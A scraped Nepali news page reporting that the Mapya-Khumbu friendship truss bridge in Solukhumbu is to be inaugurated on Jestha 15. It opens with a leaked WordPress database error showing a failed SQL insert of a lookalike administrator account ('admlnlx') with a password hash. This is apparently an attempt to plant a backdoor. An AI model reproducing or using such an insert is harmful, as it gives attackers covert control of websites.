WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5h2m4/MZsM7udSIem5Dnu6WjNDbRz.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 11:27:53', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु – दुधकोशी ओर्लाङघाटमा बन्दै गरेको माप्य–खुम्बु मितेरी पुल जेठ १५ मा उद्घाटन गरिने उद्घाटन गरिने पक्का भएको छ ।
माप्य दुधकोशी गाउँपालिका र खुम्बु पासाङ ल्हामु गाउँपालिकालाई जोड्ने ‘माप्य–खुम्बु मितेरी पुल’ को निर्माणकार्य अन्तिम चरणमा पुगेको छ । माप्य दुधकोशी गाउँपालिका, खुम्बु पासाङ ल्हामु गाउँलिका, प्रदेश सरकार र संघीय सरकारको संयुक्त लगानिमा निर्मित माप्य–खुम्बु मितेरी ट्रस ब्रिजको उद्घाटन जेठ १५ मा गर्ने पक्का भएको अध्यक्ष राईले दाबी गरेका छन् । गाउँपालिकाको गौरबको आयोजनाको रुपमा लिइएको उक्त योजना मौसम प्रतिकुलता र विश्वमा महामारीको रूप लिइको ‘कोभिड नाइन्टिन’को प्रभावको बाबजुद पनि समयसीमामा नै सम्पन्न हुन लागेको अध्यक्ष राईले बताए ।